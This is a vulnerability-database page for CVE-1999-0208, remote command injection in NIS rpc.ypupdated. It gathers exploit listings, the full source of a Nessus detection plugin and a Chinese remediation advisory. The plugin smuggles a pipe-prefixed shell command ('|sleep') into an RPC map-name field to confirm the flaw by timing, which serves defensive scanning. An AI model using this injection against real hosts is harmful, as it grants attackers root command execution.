
047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
sgi
nec
ibm
critical
nessus
exploit available

Summary

rpc.ypupdated (NIS) allows remote users to execute arbitrary commands.

Vulnerable Configurations

Part Description Count
OS
Sgi
5
OS
Nec
3
OS
Ibm
2

Exploit-Db

  • descriptionHP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (2). CVE-1999-0208. Remote exploits for multiple plat...
    idEDB-ID:20259
    last seen2016-02-02
    modified1994-02-07
    published1994-02-07
    reporteranonymous
    sourcehttps://www.exploit-db.com/download/20259/
    titleHP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution 2
  • descriptionHP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (1). CVE-1999-0208. Remote exploits for multiple plat...
    idEDB-ID:20258
    last seen2016-02-02
    modified1994-02-07
    published1994-02-07
    reporterJosh D
    sourcehttps://www.exploit-db.com/download/20258/
    titleHP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution 1

Nessus

NASL familyRPC
NASL idYPUPDATED_REMOTE_EXEC.NASL
descriptionypupdated is part of NIS and allows a client to update NIS maps. This old command execution vulnerability was discovered and fixed in 1995. However, it is still possible to run ypupdated in insecure mode by adding the '-i' option.
last seen2020-06-01
modified2020-06-02
plugin id31683
published2008-03-28
reporterThis script is Copyright (C) 2008-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/31683
titleMultiple Vendor NIS rpc.ypupdated YP Map Update Arbitrary Remote Command Execution
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

# Registration branch: when the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script exits before any
# network activity takes place.
if(description)
{
 script_id(31683);
 script_version ("1.17");
 script_cve_id("CVE-1999-0208");
 script_bugtraq_id(1749, 28383);

 script_name(english:"Multiple Vendor NIS rpc.ypupdated YP Map Update Arbitrary Remote Command Execution");
 
 # Report text shown to the user: what was found, why it matters, how to fix it.
 script_set_attribute(attribute:"synopsis", value:
"'ypupdated -i' is running on this port." );
 script_set_attribute(attribute:"description", value:
"ypupdated is part of NIS and allows a client to update NIS maps.

This old command execution vulnerability was discovered and fixed in 
1995. However, it is still possible to run ypupdated in insecure
mode by adding the '-i' option.
Anybody can easily run commands as root on this machine by specifying 
an invalid map name that starts with a pipe (|) character. Exploits 
have been publicly available since the first advisory." );
 script_set_attribute(attribute:"solution", value:
"Remove the '-i' option.
If this option was not set, the rpc.ypupdated daemon is still vulnerable 
to the old flaw; contact your vendor for a patch." );
 # CVSSv2 base/temporal vectors as published by the plugin (base AC:M here,
 # even though the page header above lists the attack complexity as LOW).
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Solaris ypupdated Command Execution');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2008/03/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "1994/12/12");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
# Must follow every script_set_attribute() call above.
script_end_attributes();

 # ACT_ATTACK: this is an active check that causes a side effect on the target
 # (a `sleep` is executed under the daemon's privileges), not a passive probe.
 script_summary(english: "Run shell script through rpc.ypupdated");
 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2008-2020 Tenable Network Security, Inc.");
 script_family(english:"RPC");
 # The dependencies populate the Services/rpc-ypupdated KB entries read below.
 script_dependencie("rpc_portmap.nasl", "rpcinfo.nasl");
 exit(0);
}

include("sunrpc_func.inc");

# Reply timeout in seconds for each RPC exchange.  The timing check in test()
# accepts a round trip of up to (delay + 5) seconds, and the largest delay used
# by check_flaw() is 7, so 15 leaves the window reachable before the reply is
# discarded.
g_timeout = 15;	# Must be greater than the maximum sleep value
# RPC program number of ypupdated (100028), as also listed in the SGI advisory
# excerpt further down the page.
RPC_PROG = 100028;


# Timing-based active check.  For every delay in `sleeps`, one ypupdated
# request is sent whose map name is a shell pipe to `sleep <delay>`, and the
# round-trip time of the exchange is measured.  The function returns 1 only
# when every request's elapsed time lands inside the window
# [delay, delay + 5) seconds; any closed port, socket failure, missing reply
# or out-of-window timing returns 0 immediately.  Requiring several distinct
# delays is what keeps ordinary network latency from producing a false
# positive on its own.
#
# port   - ypupdated port to contact
# sleeps - list of delays in seconds; per the note on g_timeout, the timeout
#          must exceed the largest delay or the reply is dropped first
# udp    - non-zero to use UDP, zero for TCP
#
# Side effect on a vulnerable target: each request executes `sleep` under the
# daemon's privileges (root, according to the plugin description).
function test(port, sleeps, udp)
{
 local_var soc, mapname, packet, tictac1, tictac2, d, data, credentials, sleep;

 foreach sleep (sleeps)
 {
  # One fresh socket per probe; give up on the first port that is not open.
  if(!udp)
  {
   if (! get_tcp_port_state(port)) return 0;
   soc = open_sock_tcp (port);
   if (!soc) return 0;
  }
  else
  {
   if (! get_udp_port_state(port)) return 0;
   soc = open_sock_udp (port);
   if (!soc) return 0;
  }

# Pre-compiled plugins - there does not appear to be any function named xdr_auth_unix
# The following is from Appendix A - IETF RFC 1831 - https://tools.ietf.org/html/rfc1831#appendix-A
# Hand-built AUTH_UNIX credential body: stamp, machinename, uid, gid, then 16
# supplementary gids, all zero.  Only the XDR layout matters here; the daemon
# is not expected to verify these values (assumption - confirm against the
# vulnerable implementation if this ever stops working).
  credentials =
    xdr_long(0) +                      #stamp
    xdr_string('localhost') +          #machinename
    xdr_long(0) +                      #uid
    xdr_long(0) +                      #gid
    xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) +
    xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) +
    xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) +
    xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0);

#  credentials = xdr_auth_unix(hostname: 'localhost', uid: 0, gid: 0);

  # The "map name" is the injection vector described in the plugin text: a
  # leading pipe makes the daemon hand the rest to a shell.  `sleep` is used
  # because its only observable effect is the delay measured below.
  mapname = strcat("|sleep ", sleep, "; true > /dev/null;");

  # Request body: map name followed by the key and datum arguments.  The two
  # (2, 0x78000000) pairs look like 2-byte opaques with XDR padding; they are
  # placeholder values - verify against ypupdate_prot.x before changing them.
  data = 
        xdr_string(mapname)  +
        xdr_long(2)          +
        xdr_long(0x78000000) +
        xdr_long(2)          +
        xdr_long(0x78000000) ;

  # Program 100028 (ypupdated), version 1, procedure 1.
  packet = rpc_packet (prog:RPC_PROG, vers:1, proc:0x01, credentials:credentials, data:data, udp:udp);

  # Wall-clock time around the exchange is the whole signal of this check;
  # keep nothing else between the two unixtime() calls.
  tictac1 = unixtime();

  data = rpc_sendrecv (socket:soc, packet:packet, udp:udp, timeout:g_timeout);
  close(soc);

  tictac2 = unixtime();
  d = tictac2 - tictac1;

  # No reply at all, a reply faster than the requested delay, or one later
  # than delay + 5 seconds all disprove the injection for this probe.
  if ( isnull(data) || (d < sleep) || (d >= (sleep + 5)) )
    return 0;
 }

 return 1;
}


# Run the timing probe against every port in `ports` and raise a finding for
# each port where all three delays (1, 3 and 7 seconds) were observed.
# ports - list of ypupdated ports (presumably nothing is tested when null)
# udp   - non-zero to probe over UDP, zero for TCP
function check_flaw(ports, udp)
{
 local_var p, delays;

 delays = make_list(1, 3, 7);
 foreach p (ports)
 {
  if (! test(port:p, sleeps:delays, udp:udp)) continue;
  security_hole(port:p);
 }
}

# Main body: locate ypupdated over TCP, then over UDP, and run the timing
# check against every port found.  Ports already recorded in the KB by the
# rpc_portmap/rpcinfo dependencies are preferred; otherwise a single
# portmapper lookup of program 100028 is made.  When neither source yields a
# port the list stays null and check_flaw is still called with it (its
# foreach is then expected to iterate nothing - confirm if changing this).
tcp_ports = get_kb_list('Services/rpc-ypupdated');
if (isnull(tcp_ports))
{
 port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_TCP);
 if (port) tcp_ports = make_list(port);
}

check_flaw(ports:tcp_ports, udp:0);

  
# Same resolution for the UDP transport; a TCP finding does not short-circuit
# the UDP check, so a host listening on both can be reported twice.
udp_ports = get_kb_list('Services/udp/rpc-ypupdated');
if (isnull(udp_ports))
{
 port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_UDP);
 if (port) udp_ports = make_list(port);
}

check_flaw(ports:udp_ports, udp:1);

Saint

bid1749
descriptionrpc.ypupdated command injection vulnerability
idmisc_solaris_rpcypupdated
osvdb11517
titleypupdated
typeremote

Seebug

bulletinFamilyexploit
descriptionBUGTRAQ ID: 1749 CVE(CAN) ID: CVE-1999-0208 rpc.ypupdated RPC守护进程是Network Information Service (NIS)的一个组件,它使NIS客户端更新自己的NIS数据库。 rpc.ypupdated守护进程实现上存在输入验证漏洞,远程攻击者可能利用此漏洞以root用户的权限在主机上执行任意命令。 当守护进程收到一个Yello Pages的更新请求,它会调用Bource Shell执行'make'命令来重新计算数据库,由于没有对用户输入进行充分过滤和检查,远程攻击者可以在输入中插入某些Shell转义符来执行攻击者指定的命令。 Multiple Vendor rpc.ypupdated - HP HP-UX 10.20 - HP HP-UX 10.10 - HP HP-UX 10.1 - IBM AIX 4.1 - IBM AIX 3.2 - SGI IRIX 6.0.1XFS - SGI IRIX 6.0.1 - SGI IRIX 6.0 - SGI IRIX 5.3XFS - SGI IRIX 5.3 - SGI IRIX 5.2 - SGI IRIX 5.1.1 - SGI IRIX 5.1 - SGI IRIX 5.0.1 - SGI IRIX 5.0 - SGI IRIX 4.0.5IPR - SGI IRIX 4.0.5H - SGI IRIX 4.0.5G - SGI IRIX 4.0.5F - SGI IRIX 4.0.5E - SGI IRIX 4.0.5D - SGI IRIX 4.0.5A - SGI IRIX 4.0.5(IOP) - SGI IRIX 4.0.5 - SGI IRIX 4.0.4T - SGI IRIX 4.0.4B - SGI IRIX 4.0.4 - SGI IRIX 4.0.3 - SGI IRIX 4.0.2 - SGI IRIX 4.0.1T - SGI IRIX 4.0.1 - SGI IRIX 4.0 - SGI IRIX 3.3.3 - SGI IRIX 3.3.2 - SGI IRIX 3.3.1 - SGI IRIX 3.3 - SGI IRIX 3.2 - Sun SunOS 4.1PSR_A - Sun SunOS 4.1.4-JL - Sun SunOS 4.1.4 - Sun SunOS 4.1.3_U1 - Sun SunOS 4.1.3c - Sun SunOS 4.1.3 - Sun SunOS 4.1.2 - Sun SunOS 4.1.1 - Sun SunOS 4.1 厂商补丁: SGI --- SGI已经为此发布了一个安全公告(19951201-01-P)以及修补建议: 19951201-01-P:Avalon Security Research - rpc.ypupdate slammer exploit CERT CA-95:17 rpc.ypupdated Vulnerability 链接:<a href=ftp://patches.sgi.com/support/free/security/advisories/19951201-01-P target=_blank>ftp://patches.sgi.com/support/free/security/advisories/19951201-01-P</a> 修补建议: 1. 变成root用户 % /bin/su Password: # 2. 查看机器上是否运行了ypupdated服务,如果没有返回东西,则可能ypupdated处于关闭状态,但为了完全起见还是建议执行接下来的操作。 # rpcinfo -p localhost | grep ypupdate 100028 tcp 206 ypupdated # 3. 
编辑/usr/etc/inetd.conf (3.x and 4.x)或/etc/inetd.conf (5.0.x, 5.1.x, and 5.2),在有ypupdate那行前面加个"#"字符将其注释掉。 # vi /usr/etc/inetd.conf 找到如下这行: ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated 在其前面加"#": #ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated 存盘退出。 4.重启inetd # /etc/killall -HUP inetd 5. 验证ypupdate已经不再运行了 # rpcinfo -p localhost | grep ypupdate # 6. 返回普通用户状态 # exit $
idSSV:3080
last seen2017-11-19
modified2008-03-25
published2008-03-25
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-3080
title多家厂商rpc.ypupdated远程可执行任意命令漏洞